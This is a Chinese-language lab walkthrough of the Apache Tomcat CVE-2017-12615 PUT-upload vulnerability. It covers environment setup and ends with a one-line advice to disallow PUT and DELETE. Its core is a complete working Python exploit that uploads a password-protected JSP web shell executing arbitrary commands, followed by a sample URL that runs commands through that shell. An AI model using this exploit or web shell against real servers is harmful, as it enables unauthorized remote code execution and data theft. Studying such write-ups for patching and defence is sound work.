Apache Tomcat远程命令执行漏洞（CVE-2017-12615）

漏洞的简介

当 Tomcat运行在Windows操作系统时，且启用了HTTP PUT请求方法（例如，将 readonly 初始化参数由默认值设置为 false），攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件，JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。

漏洞影响的范围

Apache Tomcat 7.0.0 - 7.0.81

实验环境搭建

1.官网下载jdk安装包
http://www.oracle.com/technetwork/java/javase/downloads/index.html
2.根据提示安装jdk

image.png

3.配置环境变量， 添加jdk和jre路径

TIM图片20180130095026.png

4.配置成功后的截图

image.png

5.Apache Tomcat安装
下载地址：
http://www.liangchan.net/soft/download.asp?softid=9366&downid=8&id=9430

6.按照步骤提示，安装

TIM图片20180130095622.png

7.安装成功后，访问http://127.0.0.1:8080

TIM图片20180130095838.png

漏洞的利用

1.配置Apache Tomcat服务器
打开Tomcat安装目录的C:\Program Files (x86)\Apache Software Foundation\Tomcat 7.0\conf添加如下配置，在Tomcat7.0版本下默认配置是开启readonly的，需要手动配置readonly为false才可以进行漏洞利用

TIM图片20180130112514.png

2. 利用payload对目标网站发起攻击

#! -*- coding:utf-8 -*- 

import httplib

import sys

import time

body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp

+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("
"+excuteCmd(request.getParameter("cmd"))+"
");}else{out.println(":-)");}%>'''

try:

    conn = httplib.HTTPConnection(sys.argv[1])

    conn.request(method='OPTIONS', url='/ffffzz')

    headers = dict(conn.getresponse().getheaders())

    if 'allow' in headers and \
       headers['allow'].find('PUT') > 0 :

        conn.close()

        conn = httplib.HTTPConnection(sys.argv[1])

        url = "/" + str(int(time.time()))+'.jsp/'

        #url = "/" + str(int(time.time()))+'.jsp::$DATA'

        conn.request( method='PUT', url= url, body=body)

        res = conn.getresponse()

        if res.status  == 201 :

            #print 'shell:', 'http://' + sys.argv[1] + url[:-7]

            print 'shell:', 'http://' + sys.argv[1] + url[:-1]

        elif res.status == 204 :

            print 'file exists'

        else:

            print 'error'

        conn.close()

    else:

        print 'Server not vulnerable'

except Exception,e:

    print 'Error:', e

下载完后payload命名为1.py
进入cmd界面，然后切换到1.py文件目录下
接下来输入命令,运行，程序返回webshell的地址

TIM图片20180130112944.png

注意：此处1506412001.jsp为随机生成地址，请以实际获取的shell为准
在火狐浏览器中按F9打开hackbar插件，执行以下命令
http://127.0.0.1:8080/1517282489.jsp?&pwd=023&cmd=ipconfig

TIM图片20180130113133.png

结果分析：
当存在漏洞的Tomcat运行在 Windows 主机上，且启用了 HTTP PUT 请求方法，攻击者通过构造的攻击请求向服务器上传包含任意代码的 JSP 文件，造成任意代码执行。因此，通常情况下我们应该不允许DELETE和PUT操作。